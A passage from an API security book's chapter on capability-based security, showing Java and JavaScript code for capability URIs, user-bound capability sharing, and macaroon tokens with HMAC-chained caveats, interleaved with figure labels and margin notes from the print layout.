bility URI, allowing a client to securely navigate from resource to resource without
needing to manufacture any URIs by themselves.4
4 In this chapter, you’ll return links as URIs within normal JSON fields. There are standard ways of representing
links in JSON, such as JSON-LD (https://json-ld.org), but I won’t cover those in this book.
309
Capabilities and REST
You can allow a client to access and post new messages to the social space by
returning a second URI from the createSpace operation that allows access to the
messages resource for this space, as shown in listing 9.5. You simply create a second
capability URI for that path and return it as another link in the JSON response. Open
SpaceController.java in your editor again and update the end of the createSpace
method to create the second link. The new lines of code are highlighted in bold.
var uri = capabilityController.createUri(request,
"/spaces/" + spaceId, "rwd", expiry);
var messagesUri = capabilityController.createUri(request,
"/spaces/" + spaceId + "/messages", "rwd", expiry);
response.status(201);
response.header("Location", uri.toASCIIString());
return new JSONObject()
.put("name", spaceName)
.put("uri", uri)
.put("messages", messagesUri);
If you restart the API server again and create a new space, you’ll see both URIs are
now returned. A GET request to the messages URI will return a list of messages in the
space, and this can now be accessed by anybody with that capability URI. For example,
you can open that link directly in a web browser. You can also POST a new message to
the same URI. Again, this operation requires authentication in addition to the capa-
bility URI because the message explicitly claims to be from a particular user and so the
API should authenticate that claim. Permission to post the message comes from the
capability, while proof of identity comes from authentication:
$ curl -X POST -H 'Content-Type: application/json' \
-u demo:password \
-d '{"author":"demo","message":"Hello!"}' \
'https://localhost:4567/spaces/1/messages?access_token=
➥ u9wu69dl5L8AT9FNe03TM-s4H8M'
SUPPORTING DIFFERENT LEVELS OF ACCESS
The capability URIs returned so far provide full access to the resources that they iden-
tify, as indicated by the rwd permissions (read-write-delete, if you remember from
chapter 3). This means that it’s impossible to give somebody else access to the space
without giving them full access to delete other user’s messages. So much for POLA!
One solution to this is to return multiple capability URIs with different levels of
access, as shown in listing 9.6. The space owner can then give out the more restricted
URIs while keeping the URI that grants full privileges for trusted moderators only.
Open SpaceController.java again and add the additional capabilities from the listing.
Restart the API and try performing different actions with different capabilities.
Listing 9.5
Adding a messages link
Create a new
capability URI for
the messages.
Return the messages
URI as a new field in
the response.
Proof of identity is supplied
by authenticating.
Permission to post is granted
by the capability URI alone.
310
CHAPTER 9
Capability-based security and macaroons
var uri = capabilityController.createUri(request,
"/spaces/" + spaceId, "rwd", expiry);
var messagesUri = capabilityController.createUri(request,
"/spaces/" + spaceId + "/messages", "rwd", expiry);
var messagesReadWriteUri = capabilityController.createUri(
request, "/spaces/" + spaceId + "/messages", "rw",
expiry);
var messagesReadOnlyUri = capabilityController.createUri(
request, "/spaces/" + spaceId + "/messages", "r",
expiry);
response.status(201);
response.header("Location", uri.toASCIIString());
return new JSONObject()
.put("name", spaceName)
.put("uri", uri)
.put("messages-rwd", messagesUri)
.put("messages-rw", messagesReadWriteUri)
.put("messages-r", messagesReadOnlyUri);
To complete the conversion of the API to capability-based security, you need to go
through the other API actions and convert each to return appropriate capability URIs.
This is largely a straightforward task, so we won’t cover it here. One aspect to be aware
of is that you should ensure that the capabilities you return do not grant more permis-
sions than the capability that was used to access a resource. For example, if the capa-
bility used to list messages in a space granted only read permissions, then the links to
individual messages within a space should also be read-only. You can enforce this by
always basing the permissions for a new link on the permissions set for the current
request, as shown in listing 9.7 for the findMessages method. Rather than providing
read and delete permissions for all messages, you instead use the permissions from
the existing request. This ensures that users in possession of a moderator capability
will see links that allow both reading and deleting messages, while ordinary access
through a read-write or read-only capability will only see read-only message links.
var perms = request.<String>attribute("perms")
.replace("w", "");
response.status(200);
return new JSONArray(messages.stream()
.map(msgId -> "/spaces/" + spaceId + "/messages/" + msgId)
.map(path ->
capabilityController.createUri(request, path, perms))
.collect(Collectors.toList()));
Listing 9.6
Restricted capabilities
Listing 9.7
Enforcing consistent permissions
Create additional
capability URIs
with restricted
permissions.
Return the
additional
capabilities.
Look up the permissions
from the current request.
Remove any permissions
that are not applicable.
Create new capabilities using
the revised permissions.
311
Capabilities and REST
Update the remaining methods in the SpaceController.java file to return appropriate
capability URIs, remembering to follow POLA. The GitHub repository accompanying
the book (https://github.com/NeilMadden/apisecurityinaction) has completed source
code if you get stuck, but I’d recommend trying this yourself first.
TIP
You can use the ability to specify different expiry times for links to imple-
ment useful functionality. For example, when a user posts a new message, you
can return a link that lets them edit it for a few minutes only. A separate link
can provide permanent read-only access. This allows users to correct mistakes
but not change historical messages.
9.2.4
Capability URIs for browser-based clients
In section 9.2.1, I mentioned that putting the token in the URI path or query parame-
ters is less than ideal because these can leak in audit logs, Referer headers, and
through your browser history. These risks are limited when capability URIs are used in
an API but can be a real problem when these URIs are directly exposed to users in a
web browser client. If you use capability URIs in your API, browser-based clients will
need to somehow translate the URIs used in the API into URIs used for navigating the
UI. A natural approach would be to use capability URIs for this too, reusing the
tokens from the API URIs. In this section, you’ll see how to do this securely.
One approach to this problem is to put the token in a part of the URI that is not
usually sent to the server or included in Referer headers. The original solution was
Pop quiz
3
The capability URIs for each space use never-expiring database tokens. Over
time, this will fill the database with tokens. Which of the following are ways you
could prevent this?
a
Hashing tokens in the database
b
Using a self-contained token format such as JWTs
c
Using a cloud-native database that can scale up to hold all the tokens
d
Using the HmacTokenStore in addition to the DatabaseTokenStore
e
Reusing an existing token when the same capability has already been issued
4
Which is the main reason why HATEOAS is an important design principle when
using capability URIs? Pick one answer.
a
HATEOAS is a core part of REST.
b
Capability URIs are hard to remember.
c
Clients can’t be trusted to make their own URIs.
d
Roy Fielding, the inventor of REST, says that it’s important.
e
A client can’t make their own capability URIs and so can only access other
resources through links.
The answers are at the end of the chapter.
312
CHAPTER 9
Capability-based security and macaroons
developed for the Waterken server that used capability URIs extensively, under the
name web-keys (http://waterken.sourceforge.net/web-key/). In a web-key, the unguess-
able token is stored in the fragment component of the URI; that is, the bit after a #
character at the end of the URI. The fragment is normally used to jump to a particular
location within a larger document, and has the advantage that it is never sent to the
server by clients and never included in a Referer header or window.referrer field in
JavaScript, and so is less susceptible to leaking. The downside is that because the
server doesn’t see the token, the client must extract it from the URI and send it to the
server by other means.
In Waterken, which was designed for web applications, when a user clicked a web-
key link in the browser, it loaded a simple template JavaScript page. The JavaScript
then extracted the token from the query fragment (using the window.location.hash
variable) and made a second call to the web server, passing the token in a query
parameter. The flow is shown in figure 9.3.
Because the JavaScript template itself contains no sensitive data and is the same for
all URIs, it can be served with long-lived cache-control headers and so after the
browser has loaded it once, it can be reused for all subsequent capability URIs without
an extra call to the server, as shown in the lower half of figure 9.3. This approach
works well with single-page apps (SPAs) because they often already use the fragment
in this way to permit navigation in the app without causing the page to reload while
still populating the browser history.
WARNING
Although the fragment component is not sent to the server, it will
be included if a redirect occurs. If your app needs to redirect to another site,
you should always explicitly include a fragment component in the redirect
URI to avoid accidentally leaking tokens in this way.
Listing 9.8 shows how to parse and load a capability URI in this format from a Java-
Script API client. It first parses the URI using the URL class and extracts the token from
the hash field, which contains the fragment component. This field include the literal
“#” character at the start, so use hash.substring(1) to remove this. You should then
remove this component from the URI to send to the API and instead add the token
back as a query parameter. This ensures that the CapabilityController will see the
token in the expected place. Navigate to src/main/resources/public and create a new
file named capability.js with the contents of the listing.
NOTE
This code assumes that UI pages correspond directly to URIs in your
API. For an SPA this won’t be true, and there is (by definition) a single UI page
that handles all requests. In this case, you’ll need to encode the API path
and the token into the fragment together in a form such as #/spaces/1/
messages&tok=abc123. Modern frameworks such as Vue or React can use the
HTML 5 history API to make SPA URIs look like normal URIs (without the
fragment). When using these frameworks, you should ensure the token is in
the real fragment component; otherwise, the security benefits are lost.
313
Capabilities and REST
function getCap(url, callback) {
let capUrl = new URL(url);
let token = capUrl.hash.substring(1);
capUrl.hash = '';
capUrl.search = '?access_token=' + token;
return fetch(capUrl.href)
.then(response => response.json())
.then(callback)
.catch(err => console.error('Error: ', err));
}
Listing 9.8
Loading a capability URI from JavaScript
JavaScript template
Web server
API
The browser loads
a capability URI.
The JavaScript extracts the
token from the fragment and
makes an Ajax request to the
server with the token this time.
Browser
https://example.com/foo#abc123...
GET /foo
GET /foo?s=abc123..
The initial request to
the server loads a static
JavaScript template,
ignoring the fragment.
API
Browser
https://example.com/foo#abc123...
On subsequent requests, the
JavaScript template will already
be in the browser’s cache.
GET /foo?s=abc123..
Figure 9.3
In the Waterken web-key design for capability URIs, the token is
stored in the fragment of the URI, which is never sent to the server. When a
browser loads such a URI, it will initially load a static JavaScript page that then
extracts the token from the fragment and uses it to make Ajax requests to the
API. The JavaScript template can be cached by the browser, avoiding the extra
roundtrip for subsequent requests.
Parse the URL and extract
the token from the fragment
(hash) component.
Blank
out the
fragment.
Add the token to
the URI query
parameters.
Now fetch the URI to call
the API with the token.
314
CHAPTER 9
Capability-based security and macaroons
9.2.5
Combining capabilities with identity
All calls to the Natter API are now authorized purely using capability tokens, which
are scoped to an individual resource and not tied to any user. As you saw with the sim-
ple message browser example in the last section, you can even hard-code read-only
capability URIs into a web page to allow completely anonymous browsing of messages.
Some API calls still require user authentication though, such as creating a new space
or posting a message. The reason is that those API actions involve claims about who
the user is, so you still need to authenticate those claims to ensure they are genuine,
for accountability reasons rather than for authorization. Otherwise, anybody with a
capability URI to post messages to a space could use it to impersonate any other user.
You may also want to positively identify users for other reasons, such as to ensure
you have an accurate audit log of who did what. Because a capability URI may be
shared by lots of users, it is useful to identify those users independently from how
their requests are authorized. Finally, you may want to apply some identity-based
access controls on top of the capability-based access. For example, in Google Docs
(https://docs.google.com) you can share documents using capability URIs, but you
can also restrict this sharing to only users who have an account in your company’s
domain. To access the document, a user needs to both have the link and be signed
into a Google account linked to the same company.
There are a few ways to communicate identity in a capability-based system:
You can associate a username and other identity claims with each capability
token. The permissions in the token are still what grants access, but the token
additionally authenticates identity claims about the user that can be used for
audit logging or additional access checks. The major downside of this approach
is that sharing a capability URI lets the recipient impersonate you whenever
they make calls to the API using that capability. Nevertheless, this approach can
be useful when generating short-lived capabilities that are only intended for a
single user. The link sent in a password reset email can be seen as this kind of
capability URI because it provides a limited-time capability to reset the pass-
word tied to one user’s account.
Pop quiz
5
Which of the following is the main security risk when including a capability token
in the fragment component of a URI?
a
URI fragments aren’t RESTful.
b
The random token makes the URI look ugly.
c
The fragment may be leaked in server logs and the HTTP Referer header.
d
If the server performs a redirect, the fragment will be copied to the new URI.
e
The fragment may already be used for other data, causing it to be overwritten.
The answer is at the end of the chapter.
315
Capabilities and REST
You could use a traditional authentication mechanism, such as a session cookie,
to identify the user in addition to requiring a capability token, as shown in fig-
ure 9.4. The cookie would no longer be used to authorize API calls but would
instead be used to identify the user for audit logging or for additional checks.
Because the cookie is no longer used for access control, it is less sensitive and so
can be a long-lived persistent cookie, reducing the need for the user to fre-
quently log in.
When developing a REST API, the second option is often attractive because you can
reuse traditional cookie-based authentication technologies such as a centralized
OpenID Connect identity provider (chapter 7). This is the approach taken in the Nat-
ter API, where the permissions for an API call come from a capability URI, but some
API calls need additional user authentication using a traditional mechanism such as
HTTP Basic authentication or an authentication token or cookie.
To switch back to using cookies for authentication, open the Main.java file in your
editor and find the lines that create the TokenController object. Change the token-
Store variable to use the CookieTokenStore that you developed back in chapter 4:
SecureTokenStore tokenStore = new CookieTokenStore();
var tokenController = new TokenController(tokenStore);
9.2.6
Hardening capability URIs
You may wonder if you can do away with the anti-CSRF token now that you’re using
capabilities for access control, which are immune to CSRF. This would be a mistake,
because an attacker that has a genuine capability to access the API can still use a CSRF
attack to make their requests appear to come from a different user. The authority to
API
Client
POST /abc?tok=sjkhfDF...
Cookie: user=alice
The capability URI grants access.
A cookie identifies the
user for audit logs.
Figure 9.4
By combining capability URIs with a traditional
authentication mechanism such as cookies, the API can enforce
access using capabilities while authenticating identity claims
using the cookie. The same capability URI can be shared between
users, but the API is still able to positively identify each of them.
316
CHAPTER 9
Capability-based security and macaroons
access the API comes from the attacker’s capability URI, but the identity of the user
comes from the cookie. If you keep the existing anti-CSRF token though, clients are
required to send three credentials on every request:
The cookie identifying the user
The anti-CSRF token
The capability token authorizing the specific request
This is a bit excessive. At the same time, the capability tokens are vulnerable to being
stolen. For example, if a capability URI meant for a moderator is stolen, then it can be
used by anybody to delete messages. You can solve both problems by tying the capabil-
ity tokens to an authenticated user and preventing them being used by anybody else.
This removes one of the benefits of capability URIs—that they are easy to share—but
improves the overall security:
If a capability token is stolen, it can’t be used without a valid login cookie for
the user. If the cookie is set with the HttpOnly and Secure flags, then it becomes
much harder to steal.
You can now remove the separate anti-CSRF token because each capability URI
effectively acts as an anti-CSRF token. The cookie can’t be used without the
capability and the capability can’t be used without the cookie.
Listing 9.9 shows how to associate a capability token with an authenticated user by
populating the username attribute of the token that you previously left blank. Open
the CapabilityController.java file in your editor and add the highlighted lines of code.
public URI createUri(Request request, String path, String perms,
Duration expiryDuration) {
var subject = (String) request.attribute("subject");
var token = new Token(now().plus(expiryDuration), subject);
token.attributes.put("path", path);
token.attributes.put("perms", perms);
var tokenId = tokenStore.create(request, token);
var uri = URI.create(request.uri());
return uri.resolve(path + "?access_token=" + tokenId);
}
You can then adjust the lookupPermissions method in the same file to return no per-
missions if the username associated with the capability token doesn’t match the
authenticated user, as shown in listing 9.10. This ensures that the capability can’t be
used without an associated session for the user and that the session cookie can only
be used when it matches the capability token, effectively preventing CSRF attacks too.
Listing 9.9
Linking a capability with a user
Look up the
authenticated
user.
Associate
the capability
with the user.
317
Capabilities and REST
public void lookupPermissions(Request request, Response response) {
var tokenId = request.queryParams("access_token");
if (tokenId == null) { return; }
tokenStore.read(request, tokenId).ifPresent(token -> {
if (!Objects.equals(token.username,
request.attribute("subject"))) {
return;
}
var tokenPath = token.attributes.get("path");
if (Objects.equals(tokenPath, request.pathInfo())) {
request.attribute("perms",
token.attributes.get("perms"));
}
});
}
You can now delete the code that checks the anti-CSRF token in the CookieToken-
Store if you wish and rely on the capability code to protect against CSRF. Refer to
chapter 4 to see how the original version looked before CSRF protection was added.
You’ll also need to adjust the TokenController.validateToken method to not
reject a request that doesn’t have an anti-CSRF token. If you get stuck, check out
chapter09-end of the GitHub repository accompanying the book, which has all the
required changes.
SHARING ACCESS
Because capability URIs are now tied to individual users, you need a new mechanism
to share access to social spaces and individual messages. Listing 9.11 shows a new oper-
ation to allow a user to exchange one of their own capability URIs for one for a differ-
ent user, with an option to specify a reduced set of permissions. The method reads a
capability URI from the input and looks up the associated token. If the URI matches
the token and the requested permissions are a subset of the permissions granted by
the original capability URI, then the method creates a new capability token with the
new permissions and user and returns the requested URI. This new URI can then be
safely shared with the intended user. Open the CapabilityController.java file and add
the new method.
public JSONObject share(Request request, Response response) {
var json = new JSONObject(request.body());
var capUri = URI.create(json.getString("uri"));
var path = capUri.getPath();
var query = capUri.getQuery();
var tokenId = query.substring(query.indexOf('=') + 1);
Listing 9.10
Verifying the user
Listing 9.11
Sharing capability URIs
If the authenticated
user doesn’t match the
capability, it returns no
permissions.
Parse the original
capability URI and
extract the token.
318
CHAPTER 9
Capability-based security and macaroons
var token = tokenStore.read(request, tokenId).orElseThrow();
if (!Objects.equals(token.attributes.get("path"), path)) {
throw new IllegalArgumentException("incorrect path");
}
var tokenPerms = token.attributes.get("perms");
var perms = json.optString("perms", tokenPerms);
if (!tokenPerms.contains(perms)) {
Spark.halt(403);
}
var user = json.getString("user");
var newToken = new Token(token.expiry, user);
newToken.attributes.put("path", path);
newToken.attributes.put("perms", perms);
var newTokenId = tokenStore.create(request, newToken);
var uri = URI.create(request.uri());
var newCapUri = uri.resolve(path + "?access_token="
+ newTokenId);
return new JSONObject()
.put("uri", newCapUri);
}
You can now add a new route to the Main class to expose this new operation. Open the
Main.java file and add the following line to the main method:
post("/capabilities", capController::share);
You can now call this endpoint to exchange a privileged capability URI, such as the
messages-rwd URI returned from creating a space, as in the following example:
curl -H 'Content-Type: application/json' \
-d '{"uri":"/spaces/1/messages?access_token=
➥ 0ed8-IohfPQUX486d0kr03W8Ec8", "user":"demo2", "perms":"r"}' \
https://localhost:4567/share
{"uri":"/spaces/1/messages?access_token=
➥ 1YQqZdNAIce5AB_Z8J7ClMrnx68"}
The new capability URI in the response can only be used by the demo2 user and pro-
vides only read permission on the space. You can use this facility to build resource
sharing for your APIs. For example, if a user directly shares a capability URI of their
own with another user, rather than denying access completely you could allow them to
request access. This is what happens in Google Docs if you follow a link to a document
that you don’t have access to. The owner of the document can then approve access. In
Google Docs this is done by adding an entry to an access control list (chapter 3) asso-
ciated with each document, but with capabilities, the owner could generate a capabil-
ity URI instead that is then emailed to the recipient.
Look up the
token and check
that it matches
the URI.
Check that the
requested permissions
are a subset of the
token permissions.
Create and
store the new
capability token.
Return the
requested
capability URI.
319
Macaroons: Tokens with caveats
9.3
Macaroons: Tokens with caveats
Capabilities allow users to easily share fine-grained access to their resources with other
users. If a Natter user wants to share one of their messages with somebody who doesn’t
have a Natter account, they can easily do this by creating a read-only capability URI for
that specific message. The other user will be able to read only that one message and
won’t get access to any other messages or the ability to post messages themselves.
Sometimes the granularity of capability URIs doesn’t match up with how users
want to share resources. For example, suppose that you want to share read-only access
to a snapshot of the conversations since yesterday in a social space. It’s unlikely that
the API will always supply a capability URI that exactly matches the user’s wishes; the
createSpace action already returns four URIs, and none of them quite fit the bill.
Macaroons provide a solution to this problem by allowing anybody to append caveats
to a capability that restrict how it can be used. Macaroons were invented by a team of
academic and Google researchers in a paper published in 2014 (https://ai.google/
research/pubs/pub41892).
DEFINITION
A macaroon is a type of cryptographic token that can be used to
represent capabilities and other authorization grants. Anybody can append
new caveats to a macaroon that restrict how it can be used.
To address our example, the user could append the following caveats to their capa-
bility to create a new capability that allows only read access to messages since lunch-
time yesterday:
method = GET
since >= 2019-10-12T12:00:00Z
Unlike the share method that you added in section 9.2.6, macaroon caveats can
express general conditions like these. The other benefit of macaroons is that anyone
can append a caveat to a macaroon using a macaroon library, without needing to call
an API endpoint or have access to any secret keys. Once the caveat has been added it
can’t be removed.
Macaroons use HMAC-SHA256 tags to protect the integrity of the token and any
caveats just like the HmacTokenStore you developed in chapter 5. To allow anybody to
append caveats to a macaroon, even if they don’t have the key, macaroons use an
interesting property of HMAC: the authentication tag output from HMAC can itself
be used as a key to sign a new message with HMAC. To append a caveat to a maca-
roon, you use the old authentication tag as the key to compute a new HMAC-SHA256
tag over the caveat, as shown in figure 9.5. You then throw away the old authentication
tag and append the caveat and the new tag to the macaroon. Because it’s infeasible to
reverse HMAC to recover the old tag, nobody can remove caveats that have been
added unless they have the original key.
320
CHAPTER 9
Capability-based security and macaroons
WARNING
Because anybody can add a caveat to a macaroon, it is important
that they are used only to restrict how a token is used. You should never trust
any claims in a caveat or grant additional access based on their contents.
When the macaroon is presented back to the API, it can use the original HMAC key to
reconstruct the original tag and all the caveat tags and check if it comes up with the
same signature value at the end of the chain of caveats. Listing 9.12 shows an example
of how to verify an HMAC chain just like that used by macaroons.
First initialize a javax.crypto.Mac object with the API’s authentication key (see
chapter 5 for how to generate this) and then compute an initial tag over the maca-
roon unique identifier. You then loop through each caveat in the chain and compute
a new HMAC tag over the caveat, using the old tag as the key.5 Finally, you compare
the computed tag with the tag that was supplied with the macaroon using a constant-
time equality function. Listing 9.14 is just to demonstrate how it works; you’ll use a
real macaroon library in the Natter API so you don’t need to implement this method.
private boolean verify(String id, List<String> caveats, byte[] tag)
throws Exception {
var hmac = Mac.getInstance("HmacSHA256");
hmac.init(macKey);
5 If you are a functional programming enthusiast, then this can be elegantly written as a left-fold or reduce
operation.
Listing 9.12
Verifying the HMAC chain
Identifier
Caveat 1
Caveat 2
Tag
HMAC-SHA256
New caveat
New tag
Identifier
Caveat 1
Caveat 2
New caveat
New tag
The new caveat is fed into HMAC-SHA256
using the old HMAC tag as the key.
The new caveat and tag are
appended to the macaroon.
The old tag is discarded.
Figure 9.5
To append a new caveat to a macaroon, you use the old HMAC
tag as the key to authenticate the new caveat. You then throw away the
old tag and append the new caveat and tag. Because nobody can reverse
HMAC to calculate the old tag, they cannot remove the caveat.
Initialize HMAC-SHA256 with
the authentication key.
321
Macaroons: Tokens with caveats
var computed = hmac.doFinal(id.getBytes(UTF_8));
for (var caveat : caveats) {
hmac.init(new SecretKeySpec(computed, "HmacSHA256"));
computed = hmac.doFinal(caveat.getBytes(UTF_8));
}
return MessageDigest.isEqual(tag, computed);
}
After the HMAC tag has been verified, the API then needs to check that the caveats
are satisfied. There’s no standard set of caveats that APIs support, so like OAuth2
scopes it’s up to the API designer to decide what to support. There are two broad cat-
egories of caveats supported by macaroon libraries:
First-party caveats are restrictions that can be easily verified by the API at the
point of use, such as restricting the times of day at which the token can be used.
First-party caveats are discussed in more detail in section 9.3.3.
Third-party caveats are restrictions which require the client to obtain a proof
from a third-party service, such as proof that the user is an employee of a partic-
ular company or that they are over 18. Third-party caveats are discussed in sec-
tion 9.3.4.
9.3.1
Contextual caveats
A significant advantage of macaroons over other token forms is that they allow the cli-
ent to attach contextual caveats just before the macaroon is used. For example, a client
that is about to send a macaroon to an API over an untrustworthy communication
channel can attach a first-party caveat limiting it to only be valid for HTTP PUT
requests to that specific URI for the next 5 seconds. That way, if the macaroon is sto-
len, then the damage is limited because the attacker can only use the token in very
restricted circumstances. Because the client can keep a copy of the original unre-
stricted macaroon, their own ability to use the token is not limited in the same way.
DEFINITION
A contextual caveat is a caveat that is added by a client just before
use. Contextual caveats allow the authority of a token to be restricted before
sending it over an insecure channel or to an untrusted API, limiting the dam-
age that might occur if the token is stolen.
The ability to add contextual caveats makes macaroons one of the most important
recent developments in API security. Macaroons can be used with any token-based
authentication and even OAuth2 access tokens if your authorization server supports
them.6 On the other hand, there is no formal specification of macaroons and aware-
ness and adoption of the format is still quite limited, so they are not as widely sup-
ported as JWTs (chapter 6).
6 My employer, ForgeRock, has added experimental support for macaroons to their authorization server software.
Compute an
initial tag over
the macaroon
identifier.
Compute a new tag for
each caveat using the
old tag as the key.
Compare the tags
with a constant-time
equality function.
322
CHAPTER 9
Capability-based security and macaroons
9.3.2
A macaroon token store
To use macaroons in the Natter API, you can use the open source jmacaroons library
(https://github.com/nitram509/jmacaroons). Open the pom.xml file in your editor
and add the following lines to the dependencies section:
<dependency>
<groupId>com.github.nitram509</groupId>
<artifactId>jmacaroons</artifactId>
<version>0.4.1</version>
</dependency>
You can now build a new token store implementation using macaroons as shown in
listing 9.13. To create a macaroon, you’ll first use another TokenStore implementa-
tion to generate the macaroon identifier. You can use any of the existing stores, but to
keep the tokens compact you’ll use the DatabaseTokenStore in these examples. You
could also use the JsonTokenStore, in which case the macaroon HMAC tag also pro-
tects it against tampering.
You then create the macaroon using the MacaroonsBuilder.create() method,
passing in the identifier and the HMAC key. An odd quirk of the macaroon API
means you have to pass the raw bytes of the key using macKey.getEncoded(). You can
also give an optional hint for where the macaroon is intended to be used. Because
you’ll be using these with capability URIs that already include the full location, you
can leave that field blank to save space. You can then use the macaroon.serialize()
method to convert the macaroon into a URL-safe base64 string format. In the same
Natter API project you’ve been using so far, navigate to src/main/java/com/manning/
apisecurityinaction/token and create a new file called MacaroonTokenStore.java.
Copy the contents of listing 9.13 into the file and save it.
WARNING
The location hint is not included in the authentication tag and is
intended only as a hint to the client. Its value shouldn’t be trusted because it
can be tampered with.
package com.manning.apisecurityinaction.token;
import java.security.Key;
import java.time.Instant;
import java.time.temporal.ChronoUnit;
import java.util.Optional;
import com.github.nitram509.jmacaroons.*;
import com.github.nitram509.jmacaroons.verifier.*;
import spark.Request;
public class MacaroonTokenStore implements SecureTokenStore {
private final TokenStore delegate;
private final Key macKey;
Listing 9.13
The MacaroonTokenStore
323
Macaroons: Tokens with caveats
private MacaroonTokenStore(TokenStore delegate, Key macKey) {
this.delegate = delegate;
this.macKey = macKey;
}
@Override
public String create(Request request, Token token) {
var identifier = delegate.create(request, token);
var macaroon = MacaroonsBuilder.create("",
macKey.getEncoded(), identifier);
return macaroon.serialize();
}
}
Like the HmacTokenStore from chapter 4, the macaroon token store only provides
authentication of tokens and not confidentiality unless the underlying store already
provides that. Just as you did in chapter 5, you can create two static factory methods
that return a correctly typed store depending on the underlying token store:
If the underlying token store is a ConfidentialTokenStore, then it returns a
SecureTokenStore because the resulting store provides both confidentiality
and authenticity of tokens.
Otherwise, it returns an AuthenticatedTokenStore to make clear that confi-
dentiality is not guaranteed.
These factory methods are shown in listing 9.14 and are very similar to the ones you
created in chapter 5, so open the MacaroonTokenStore.java file again and add these
new methods.
public static SecureTokenStore wrap(
ConfidentialTokenStore tokenStore, Key macKey) {
return new MacaroonTokenStore(tokenStore, macKey);
}
public static AuthenticatedTokenStore wrap(
TokenStore tokenStore, Key macKey) {
return new MacaroonTokenStore(tokenStore, macKey);
}
To verify a macaroon, you deserialize and validate the macaroon using a Macaroons-
Verifier, which will verify the HMAC tag and check any caveats. If the macaroon is
valid, then you can look up the identifier in the delegate token store. To revoke a mac-
aroon, you simply deserialize and revoke the identifier. In most cases, you shouldn’t
check the caveats on the token when it is being revoked, because if somebody has
gained access to your token, the least malicious thing they can do with it is revoke it!
However, in some cases, malicious revocation might be a real threat, in which case you
could verify the caveats to reduce the risk of this occurring. Listing 9.15 shows the
Listing 9.14
Factory methods
Use another
token store to
create a unique
identifier for
this macaroon.
Create the
macaroon with a
location hint, the
identifier, and the
authentication key.
Return the serialized
URL-safe string form
of the macaroon.
If the underlying store
provides confidentiality of
token data, then return a
SecureTokenStore.
Otherwise, return an
AuthenticatedTokenStore.
324
CHAPTER 9
Capability-based security and macaroons
operations to read and revoke a macaroon token. Open the MacaroonTokenStore
.java file again and add the new methods.
@Override
public Optional<Token> read(Request request, String tokenId) {
var macaroon = MacaroonsBuilder.deserialize(tokenId);
var verifier = new MacaroonsVerifier(macaroon);
if (verifier.isValid(macKey.getEncoded())) {
return delegate.read(request, macaroon.identifier);
}
return Optional.empty();
}
@Override
public void revoke(Request request, String tokenId) {
var macaroon = MacaroonsBuilder.deserialize(tokenId);
delegate.revoke(request, macaroon.identifier);
}
WIRING IT UP
You can now wire up the CapabilityController to use the new token store for capa-
bility tokens. Open the Main.java file in your editor and find the lines that construct
the CapabilityController. Update the file to use the MacaroonTokenStore instead.
You may need to first move the code that reads the macKey from the keystore (see
chapter 6) from later in the file. The code should look as follows, with the new part
highlighted in bold:
var keyPassword = System.getProperty("keystore.password",
"changeit").toCharArray();
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("keystore.p12"),
keyPassword);
var macKey = keyStore.getKey("hmac-key", keyPassword);
var encKey = keyStore.getKey("aes-key", keyPassword);
var capController = new CapabilityController(
MacaroonTokenStore.wrap(
new DatabaseTokenStore(database), macKey));
If you now use the API to create a new space, you’ll see the macaroon tokens being
used in the capability URIs returned from the API call. You can copy and paste those
tokens into the debugger at http://macaroons.io to see the component parts.
CAUTION
You should not paste tokens from a production system into any
website. At the time of writing, macaroons.io doesn’t even support SSL.
As currently written, the macaroon token store works very much like the existing
HMAC token store. In the next sections, you’ll implement support for caveats to take
full advantage of the new token format.
Listing 9.15
Reading a macaroon token
Deserialize
and validate
the macaroon
signature and
caveats.
If the macaroon
is valid, then
look up the
identifier in the
delegate token
store.
To revoke a macaroon, revoke the
identifier in the delegate store.
325
Macaroons: Tokens with caveats
9.3.3
First-party caveats
The simplest caveats are first-party caveats, which can be verified by the API purely
based on the API request and the current environment. These caveats are represented
as strings and there is no standard format. The only commonly implemented first-
party caveat is to set an expiry time for the macaroon using the syntax:
time < 2019-10-12T12:00:00Z
You can think of this caveat as being like the expiry (exp) claim in a JWT (chapter 6).
The tokens issued by the Natter API already have an expiry time, but a client might
want to create a copy of their token with a more restricted expiry time as discussed in
section 9.3.1 on contextual caveats.
To verify any expiry time caveats, you can use a TimestampCaveatVerifier that
comes with the jmacaroons library as shown in listing 9.16. The macaroons library will
try to match each caveat to a verifier that is able to satisfy it. In this case, the verifier
checks that the current time is before the expiry time specified in the caveat. If the
verification fails, or if the library is not able to find a verifier that matches a caveat,
then the macaroon is rejected. This means that the API must explicitly register verifi-
ers for all types of caveats that it supports. Trying to add a caveat that the API doesn’t
support will prevent the macaroon from being used. Open the MacaroonToken-
Store.java file in your editor again and update the read method to verify expiry caveats
as shown in the listing.
@Override
public Optional<Token> read(Request request, String tokenId) {
var macaroon = MacaroonsBuilder.deserialize(tokenId);
var verifier = new MacaroonsVerifier(macaroon);
verifier.satisfyGeneral(new TimestampCaveatVerifier());
if (verifier.isValid(macKey.getEncoded())) {
return delegate.read(request, macaroon.identifier);
}
return Optional.empty();
}
You can also add your own caveat verifiers using two methods. The simplest is the
satisfyExact method, which will satisfy caveats that exactly match the given string.
For example, you can allow a client to restrict a macaroon to a single type of HTTP
method by adding the line:
verifier.satisfyExact("method = " + request.requestMethod());
to the read method. This ensures that a macaroon with the caveat method = GET can
only be used on HTTP GET requests, effectively making it read-only. Add that line to
the read method now.
Listing 9.16
Verifying the expiry timestamp
Add a Timestamp-
CaveatVerifier to
satisfy the expiry
caveat.
326
CHAPTER 9
Capability-based security and macaroons
A more general approach is to implement the GeneralCaveatVerifier interface,
which allows you to implement arbitrary conditions to satisfy a caveat. Listing 9.17
shows an example verifier to check that the since query parameter to the find-
Messages method is after a certain time, allowing you to restrict a client to only view
messages since yesterday. The class parses the caveat and the parameter as Instant
objects and then checks that the request is not trying to read messages older than the
caveat using the isAfter method. Open the MacaroonTokenStore.java file again and
add the contents of listing 9.17 as an inner class.
private static class SinceVerifier implements GeneralCaveatVerifier {
private final Request request;
private SinceVerifier(Request request) {
this.request = request;
}
@Override
public boolean verifyCaveat(String caveat) {
if (caveat.startsWith("since > ")) {
var minSince = Instant.parse(caveat.substring(8));
var reqSince = Instant.now().minus(1, ChronoUnit.DAYS);
if (request.queryParams("since") != null) {
reqSince = Instant.parse(request.queryParams("since"));
}
return reqSince.isAfter(minSince);
}
return false;
}
}
You can then add the new verifier to the read method by adding the following line
verifier.satisfyGeneral(new SinceVerifier(request));
next to the lines adding the other caveat verifiers. The finished code to construct the
verifier should look as follows:
